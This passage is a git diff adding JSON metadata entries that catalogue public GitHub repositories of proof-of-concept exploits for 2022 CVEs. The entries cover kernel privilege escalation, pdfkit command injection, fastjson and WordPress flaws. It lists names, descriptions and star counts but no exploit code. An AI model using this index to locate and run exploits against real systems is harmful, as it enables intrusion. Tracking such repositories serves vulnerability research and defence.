"html_url": "https:\/\/github.com\/x0reaxeax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x0reaxeax\/exec-prot-bypass", + "description": "Bypassing Linux Executable Space Protection using 20+ years old tools (CVE-2022-25265).", + "fork": false, + "created_at": "2022-02-16T12:42:24Z", + "updated_at": "2024-12-23T08:19:17Z", + "pushed_at": "2022-02-19T18:06:01Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-25265", + "dep-bypass", + "exploit", + "linux", + "noexec" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25313.json b/2022/CVE-2022-25313.json index bd0e18f142..6c83f1c2f3 100644 --- a/2022/CVE-2022-25313.json +++ b/2022/CVE-2022-25313.json @@ -29,5 +29,36 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 626759487, + "name": "external_expat-2.1.0_CVE-2022-25313", + "full_name": "Trinadh465\/external_expat-2.1.0_CVE-2022-25313", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_expat-2.1.0_CVE-2022-25313", + "description": null, + "fork": false, + "created_at": "2023-04-12T05:30:46Z", + "updated_at": "2023-04-12T05:44:54Z", + "pushed_at": "2023-04-12T05:45:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-25315.json b/2022/CVE-2022-25315.json index 1d896749f5..047016921e 100644 --- a/2022/CVE-2022-25315.json +++ b/2022/CVE-2022-25315.json @@ -29,5 +29,36 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 624274624, + "name": "external_expat_v2.1.0_CVE-2022-25315", + "full_name": "hshivhare67\/external_expat_v2.1.0_CVE-2022-25315", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/external_expat_v2.1.0_CVE-2022-25315", + "description": null, + "fork": false, + "created_at": "2023-04-06T05:42:39Z", + "updated_at": "2023-04-06T05:49:21Z", + "pushed_at": "2023-04-06T05:49:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-25365.json b/2022/CVE-2022-25365.json new file mode 100644 index 0000000000..31536dc401 --- /dev/null +++ b/2022/CVE-2022-25365.json @@ -0,0 +1,33 @@ +[ + { + "id": 603748967, + "name": "CVE-2022-25365", + "full_name": "followboy1999\/CVE-2022-25365", + "owner": { + "login": "followboy1999", + "id": 4121091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4121091?v=4", + "html_url": "https:\/\/github.com\/followboy1999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/followboy1999\/CVE-2022-25365", + "description": null, + "fork": false, + "created_at": "2023-02-19T13:19:10Z", + "updated_at": "2024-05-27T08:43:16Z", + "pushed_at": "2023-02-19T13:32:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25375.json b/2022/CVE-2022-25375.json new file mode 100644 index 0000000000..e1a03ed116 --- /dev/null +++ b/2022/CVE-2022-25375.json @@ -0,0 +1,33 @@ +[ + { + "id": 460460049, + "name": "rndis-co", + "full_name": "szymonh\/rndis-co", + "owner": { + "login": "szymonh", + "id": 12231135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4", + "html_url": "https:\/\/github.com\/szymonh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szymonh\/rndis-co", + "description": "CVE-2022-25375 - Demo exploit of RNDIS USB Gadget", + "fork": false, + "created_at": "2022-02-17T14:02:58Z", + "updated_at": "2025-01-05T14:13:23Z", + "pushed_at": "2022-02-20T19:56:48Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2546.json b/2022/CVE-2022-2546.json new file mode 100644 index 0000000000..b556bdbf13 --- /dev/null +++ b/2022/CVE-2022-2546.json @@ -0,0 +1,33 @@ +[ + { + "id": 859921517, + "name": "CVE-2022-2546", + "full_name": "OpenXP-Research\/CVE-2022-2546", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-2546", + "description": "All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS + CSRF", + "fork": false, + "created_at": "2024-09-19T14:05:55Z", + "updated_at": "2024-09-19T14:06:07Z", + "pushed_at": "2024-09-19T14:06:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25479.json b/2022/CVE-2022-25479.json new file mode 100644 index 0000000000..878bbb9da4 --- /dev/null +++ b/2022/CVE-2022-25479.json @@ -0,0 +1,33 @@ +[ + { + "id": 858573400, + "name": "CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "full_name": "SpiralBL0CK\/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "description": "CVE-2024-40431+CVE-2022-25479 chain for EOP(DATA ONLY ATTACK) ", + "fork": false, + "created_at": "2024-09-17T06:28:17Z", + "updated_at": "2024-12-06T09:40:43Z", + "pushed_at": "2024-10-16T22:27:13Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 44, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25636.json b/2022/CVE-2022-25636.json index 868c22e7bd..3b0ca5a69e 100644 --- a/2022/CVE-2022-25636.json +++ b/2022/CVE-2022-25636.json @@ -1,4 +1,66 @@ [ + { + "id": 467109253, + "name": "CVE-2022-25636", + "full_name": "Bonfee\/CVE-2022-25636", + "owner": { + "login": "Bonfee", + "id": 53857102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53857102?v=4", + "html_url": "https:\/\/github.com\/Bonfee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bonfee\/CVE-2022-25636", + "description": "CVE-2022-25636", + "fork": false, + "created_at": "2022-03-07T13:38:41Z", + "updated_at": "2025-01-04T08:47:19Z", + "pushed_at": "2022-03-07T17:18:19Z", + "stargazers_count": 427, + "watchers_count": 427, + "has_discussions": false, + "forks_count": 83, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 83, + "watchers": 427, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 473492971, + "name": "CVE-2022-25636", + "full_name": "chenaotian\/CVE-2022-25636", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2022-25636", + "description": "CVE-2022-0185 analysis write up", + "fork": false, + "created_at": "2022-03-24T07:04:55Z", + "updated_at": "2022-08-05T06:48:34Z", + "pushed_at": "2022-03-24T07:10:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, { "id": 478013602, "name": "CVE-2022-25636-PipeVersion", diff --git a/2022/CVE-2022-25640.json b/2022/CVE-2022-25640.json new file mode 100644 index 0000000000..21bd20b94c --- /dev/null +++ b/2022/CVE-2022-25640.json @@ -0,0 +1,33 @@ +[ + { + "id": 470630889, + "name": "cve-2022-25640-exploit", + "full_name": "dim0x69\/cve-2022-25640-exploit", + "owner": { + "login": "dim0x69", + "id": 1571696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1571696?v=4", + "html_url": "https:\/\/github.com\/dim0x69", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dim0x69\/cve-2022-25640-exploit", + "description": "Exploitation of CVE-2020-256480 using scapy", + "fork": false, + "created_at": "2022-03-16T14:59:08Z", + "updated_at": "2022-03-29T00:14:52Z", + "pushed_at": "2022-03-16T15:05:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25765.json b/2022/CVE-2022-25765.json new file mode 100644 index 0000000000..6cf987597f --- /dev/null +++ b/2022/CVE-2022-25765.json @@ -0,0 +1,284 @@ +[ + { + "id": 574239439, + "name": "CVE-2022-25765-pdfkit-Exploit-Reverse-Shell", + "full_name": "PurpleWaveIO\/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell", + "owner": { + "login": "PurpleWaveIO", + "id": 104524404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104524404?v=4", + "html_url": "https:\/\/github.com\/PurpleWaveIO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PurpleWaveIO\/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell", + "description": "pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765", + "fork": false, + "created_at": "2022-12-04T21:00:05Z", + "updated_at": "2024-04-09T12:36:11Z", + "pushed_at": "2022-12-06T19:00:15Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 575460378, + "name": "PDFKitExploit", + "full_name": "Wai-Yan-Kyaw\/PDFKitExploit", + "owner": { + "login": "Wai-Yan-Kyaw", + "id": 65071822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65071822?v=4", + "html_url": "https:\/\/github.com\/Wai-Yan-Kyaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wai-Yan-Kyaw\/PDFKitExploit", + "description": "A Shell exploit for CVE-2022-25765", + "fork": false, + "created_at": "2022-12-07T15:04:59Z", + "updated_at": "2022-11-30T21:24:23Z", + "pushed_at": "2022-11-29T09:25:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 576947018, + "name": "CVE-2022-25765", + "full_name": "LordRNA\/CVE-2022-25765", + "owner": { + "login": "LordRNA", + "id": 1210799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1210799?v=4", + "html_url": "https:\/\/github.com\/LordRNA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LordRNA\/CVE-2022-25765", + "description": "PoC for Blind RCE for CVE-2022-25765 (Tested in HTB - Precious Machine)", + "fork": false, + "created_at": "2022-12-11T14:02:49Z", + "updated_at": "2023-10-24T03:11:13Z", + "pushed_at": "2022-12-11T14:25:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580436493, + "name": "PDFkit-CMD-Injection", + "full_name": "shamo0\/PDFkit-CMD-Injection", + "owner": { + "login": "shamo0", + "id": 48299520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4", + "html_url": "https:\/\/github.com\/shamo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shamo0\/PDFkit-CMD-Injection", + "description": "CVE-2022-25765 pdfkit <0.8.6 command injection.", + "fork": false, + "created_at": "2022-12-20T14:59:41Z", + "updated_at": "2024-07-02T10:01:35Z", + "pushed_at": "2022-12-21T14:19:03Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2022", + "25765", + "cmd", + "command", + "cve", + "exploit", + "injection", + "pdfkit", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 594688502, + "name": "PDFkit-CMD-Injection-CVE-2022-25765", + "full_name": "nikn0laty\/PDFkit-CMD-Injection-CVE-2022-25765", + "owner": { + "login": "nikn0laty", + "id": 96344826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96344826?v=4", + "html_url": "https:\/\/github.com\/nikn0laty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nikn0laty\/PDFkit-CMD-Injection-CVE-2022-25765", + "description": "Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6", + "fork": false, + "created_at": "2023-01-29T10:36:40Z", + "updated_at": "2024-11-18T15:37:59Z", + "pushed_at": "2023-01-29T11:01:27Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 599828263, + "name": "exploit-CVE-2022-25765", + "full_name": "UNICORDev\/exploit-CVE-2022-25765", + "owner": { + "login": "UNICORDev", + "id": 103281826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103281826?v=4", + "html_url": "https:\/\/github.com\/UNICORDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UNICORDev\/exploit-CVE-2022-25765", + "description": "Exploit for CVE-2022–25765 (pdfkit) - Command Injection", + "fork": false, + "created_at": "2023-02-10T00:50:35Z", + "updated_at": "2024-11-23T22:33:04Z", + "pushed_at": "2024-05-20T00:34:48Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve", + "cve-2022-25765", + "exploit", + "hackthebox", + "htb", + "linux", + "pdfkit", + "penetration-testing", + "proof-of-concept", + "python", + "unicord", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604742294, + "name": "PDFkit-CMD-Injection", + "full_name": "lekosbelas\/PDFkit-CMD-Injection", + "owner": { + "login": "lekosbelas", + "id": 35641898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35641898?v=4", + "html_url": "https:\/\/github.com\/lekosbelas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lekosbelas\/PDFkit-CMD-Injection", + "description": "CVE-2022-25765 pdfkit 0.8.6 command injection.", + "fork": false, + "created_at": "2023-02-21T17:38:51Z", + "updated_at": "2023-03-04T10:34:21Z", + "pushed_at": "2023-02-22T11:55:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2022", + "25765", + "cmd", + "command", + "cve", + "exploit", + "injection", + "pdfkit", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746721441, + "name": "CVE-2022-25765", + "full_name": "lowercasenumbers\/CVE-2022-25765", + "owner": { + "login": "lowercasenumbers", + "id": 95596630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95596630?v=4", + "html_url": "https:\/\/github.com\/lowercasenumbers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lowercasenumbers\/CVE-2022-25765", + "description": "Exploit for CVE-2022-25765", + "fork": false, + "created_at": "2024-01-22T14:45:34Z", + "updated_at": "2024-01-22T14:49:17Z", + "pushed_at": "2024-01-22T22:43:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25813.json b/2022/CVE-2022-25813.json new file mode 100644 index 0000000000..1049a04b04 --- /dev/null +++ b/2022/CVE-2022-25813.json @@ -0,0 +1,41 @@ +[ + { + "id": 732790883, + "name": "CVE-2022-25813", + "full_name": "mbadanoiu\/CVE-2022-25813", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-25813", + "description": "CVE-2022-25813: FreeMarker Server-Side Template Injection in Apache OfBiz ", + "fork": false, + "created_at": "2023-12-17T20:43:26Z", + "updated_at": "2023-12-17T20:56:52Z", + "pushed_at": "2023-12-17T20:54:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-25813", + "cves", + "remote-code-execution", + "server-side-template-injection", + "user-interaction" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25845.json b/2022/CVE-2022-25845.json new file mode 100644 index 0000000000..f5c1a88807 --- /dev/null +++ b/2022/CVE-2022-25845.json @@ -0,0 +1,157 @@ +[ + { + "id": 531364227, + "name": "FastjsonVulns", + "full_name": "hosch3n\/FastjsonVulns", + "owner": { + "login": "hosch3n", + "id": 29953808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29953808?v=4", + "html_url": "https:\/\/github.com\/hosch3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hosch3n\/FastjsonVulns", + "description": "[fastjson 1.2.80] CVE-2022-25845 aspectj fileread & groovy remote classload", + "fork": false, + "created_at": "2022-09-01T04:36:50Z", + "updated_at": "2024-11-28T09:29:42Z", + "pushed_at": "2022-09-02T11:00:28Z", + "stargazers_count": 91, + "watchers_count": 91, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 91, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608248647, + "name": "CVE-2022-25845-exploit", + "full_name": "nerowander\/CVE-2022-25845-exploit", + "owner": { + "login": "nerowander", + "id": 98097702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98097702?v=4", + "html_url": "https:\/\/github.com\/nerowander", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nerowander\/CVE-2022-25845-exploit", + "description": null, + "fork": false, + "created_at": "2023-03-01T16:17:08Z", + "updated_at": "2023-12-11T10:32:55Z", + "pushed_at": "2023-03-01T16:28:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749518886, + "name": "fastjson-tp1fn1", + "full_name": "scabench\/fastjson-tp1fn1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/fastjson-tp1fn1", + "description": "a scenario based on CVE-2022-25845 yielding a TP for metadata based SCA but a FN if the callgraph is used", + "fork": false, + "created_at": "2024-01-28T20:03:23Z", + "updated_at": "2024-01-29T20:01:15Z", + "pushed_at": "2024-01-29T20:16:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 884824446, + "name": "CVE-2022-25845-In-Spring", + "full_name": "luelueking\/CVE-2022-25845-In-Spring", + "owner": { + "login": "luelueking", + "id": 93204032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93204032?v=4", + "html_url": "https:\/\/github.com\/luelueking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luelueking\/CVE-2022-25845-In-Spring", + "description": "CVE-2022-25845(fastjson1.2.80) exploit in Spring Env!", + "fork": false, + "created_at": "2024-11-07T13:06:44Z", + "updated_at": "2024-12-29T00:36:54Z", + "pushed_at": "2024-11-07T13:38:18Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 79, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 894494079, + "name": "CVE-2022-25845-In-Spring", + "full_name": "ph0ebus\/CVE-2022-25845-In-Spring", + "owner": { + "login": "ph0ebus", + "id": 108201283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108201283?v=4", + "html_url": "https:\/\/github.com\/ph0ebus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph0ebus\/CVE-2022-25845-In-Spring", + "description": "exploit by python", + "fork": false, + "created_at": "2024-11-26T13:03:38Z", + "updated_at": "2024-12-01T13:50:51Z", + "pushed_at": "2024-12-01T13:50:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2586.json b/2022/CVE-2022-2586.json new file mode 100644 index 0000000000..09fb56b930 --- /dev/null +++ b/2022/CVE-2022-2586.json @@ -0,0 +1,64 @@ +[ + { + "id": 532350223, + "name": "CVE-2022-2586-LPE", + "full_name": "aels\/CVE-2022-2586-LPE", + "owner": { + "login": "aels", + "id": 1212294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1212294?v=4", + "html_url": "https:\/\/github.com\/aels", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aels\/CVE-2022-2586-LPE", + "description": "CVE-2022-2586: Linux kernel nft_object UAF", + "fork": false, + "created_at": "2022-09-03T19:04:31Z", + "updated_at": "2024-12-12T15:10:18Z", + "pushed_at": "2022-09-03T19:06:45Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 562389091, + "name": "CVE-2022-2586", + "full_name": "sniper404ghostxploit\/CVE-2022-2586", + "owner": { + "login": "sniper404ghostxploit", + "id": 115604134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115604134?v=4", + "html_url": "https:\/\/github.com\/sniper404ghostxploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sniper404ghostxploit\/CVE-2022-2586", + "description": "gcc exploit.c -o exploit -lmnl -lnftnl -no-pie -lpthread", + "fork": false, + "created_at": "2022-11-06T07:34:32Z", + "updated_at": "2024-08-19T14:03:04Z", + "pushed_at": "2022-11-06T07:35:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2588.json b/2022/CVE-2022-2588.json new file mode 100644 index 0000000000..c177750e54 --- /dev/null +++ b/2022/CVE-2022-2588.json @@ -0,0 +1,250 @@ +[ + { + "id": 523603879, + "name": "CVE-2022-2588", + "full_name": "Markakd\/CVE-2022-2588", + "owner": { + "login": "Markakd", + "id": 18663141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18663141?v=4", + "html_url": "https:\/\/github.com\/Markakd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Markakd\/CVE-2022-2588", + "description": "exploit for CVE-2022-2588", + "fork": false, + "created_at": "2022-08-11T06:01:24Z", + "updated_at": "2025-01-02T06:41:50Z", + "pushed_at": "2023-03-04T05:52:28Z", + "stargazers_count": 476, + "watchers_count": 476, + "has_discussions": false, + "forks_count": 68, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 68, + "watchers": 476, + "score": 0, + "subscribers_count": 49 + }, + { + "id": 527766502, + "name": "2022-LPE-UAF", + "full_name": "ASkyeye\/2022-LPE-UAF", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/2022-LPE-UAF", + "description": "CVE-2022-2588", + "fork": false, + "created_at": "2022-08-22T23:42:00Z", + "updated_at": "2022-08-24T08:36:08Z", + "pushed_at": "2022-08-22T23:16:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 528001549, + "name": "2022-LPE-UAF", + "full_name": "pirenga\/2022-LPE-UAF", + "owner": { + "login": "pirenga", + "id": 10979104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10979104?v=4", + "html_url": "https:\/\/github.com\/pirenga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pirenga\/2022-LPE-UAF", + "description": "CVE-2022-2588,CVE-2022-2586,CVE-2022-2585 ", + "fork": false, + "created_at": "2022-08-23T13:23:29Z", + "updated_at": "2024-08-12T20:26:26Z", + "pushed_at": "2022-08-23T10:47:36Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 528234354, + "name": "2022-LPE-UAF", + "full_name": "konoha279\/2022-LPE-UAF", + "owner": { + "login": "konoha279", + "id": 51186443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51186443?v=4", + "html_url": "https:\/\/github.com\/konoha279", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/konoha279\/2022-LPE-UAF", + "description": "CVE-2022-2588,CVE-2022-2586,CVE-2022-2585 ", + "fork": false, + "created_at": "2022-08-24T02:20:35Z", + "updated_at": "2023-09-14T20:04:34Z", + "pushed_at": "2022-08-23T23:33:36Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 538247197, + "name": 